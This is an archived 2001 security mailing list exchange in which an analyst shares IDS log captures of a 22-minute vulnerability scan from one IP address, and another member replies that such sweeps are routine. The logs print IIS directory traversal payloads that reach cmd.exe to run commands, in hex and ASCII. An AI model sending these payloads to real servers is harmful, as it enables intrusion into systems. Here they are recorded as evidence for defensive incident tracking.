Re: Attempted unicode scans. on network

From: gattacaat_private
Date: Thu Jun 28 2001 - 21:58:42 PDT

  • Next message: HyunWoo Lee: "Re: Printer exploit?"

    Jason,
    
    I've seen this address (202.96.119.134 CHINANET Zhejiang province network) 
    and many like it.The machines on my WAN get swept 100's of times per day. 
    Not too long ago someone on this list was good enough to break out the address 
    blocks for my ACL's. I apologize for not giving that person credit as their 
    name escapes me at the moment. If you are interested I can send this to 
    you if it would help.
    
    cheers,
    gattaca
    
    ----------------------
    liquidmatrix.Org
    ----------------------
    
    <orig>
    Okay though, you have probably seen this 200 or 300 times over.  Though 
    I 
    just wanted to add this for anyone who is keeping a database of incidents.
    
    On Jun 26, 2001 we received the following vulnerability scan, on our servers,
     
    which lasted approximately 22 minutes, and attempted to connect to every 
    server we have.
    
    Though I would like to know if anyone else was hit by this person?
    
    Jason
    
    TRACE
    
    [**] WEB-MISC http directory traversal [**]
    Jun 26,01 02:54:48am	202.96.119.134:38331 -> x.x.x.x:80
    TTL: 234	TOS: 0x0	ID:60075
    ***AP*** Seq: 1161185518 Ack: 1704311082 Win: 8760
    
    474554202F736372697074732F2E2E25632E2E2F	GET./scripts/..%c../
    77696E6E742F73797374656D33322F636D642E65	winnt/system32/cmd.e
    78653F2F632B64697220485454502F312E300D0A	xe?/c+dir.HTTP/1.0..
    0D0A                                    	....................
    
    [snip]
    
    [**] WEB-FRONTPAGE fourdots request [**]
    Jun 26,01 02:58:08am	202.96.119.134:54761 -> x.x.x.x:80
    TTL: 234	TOS: 0x0	ID:44929
    ***AP*** Seq: 794224914 Ack: 2261806000 Win: 8760
    
    474554202F6D736164632F2E2E2565302E2E2F2E	GET./msadc/..%e0../.
    2E662E2E2E2E2F2E2E3025382E2E2F77696E6E74	.f..../..0%8../winnt
    2F73797374656D33322F636D642E6578653F2F63	/system32/cmd.exe?/c
    2B64697220485454502F312E300D0A0D0A      	+dir.HTTP/1.0.......
    
    [snip]
    
    
    
    ---
    Jason Robertson                
    Network Analyst            
    jasonat_private    
    http://www.astroadvice.com      
    </orig>
    Free, encrypted, secure Web-based email at www.hushmail.com
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Fri Jun 29 2001 - 08:32:43 PDT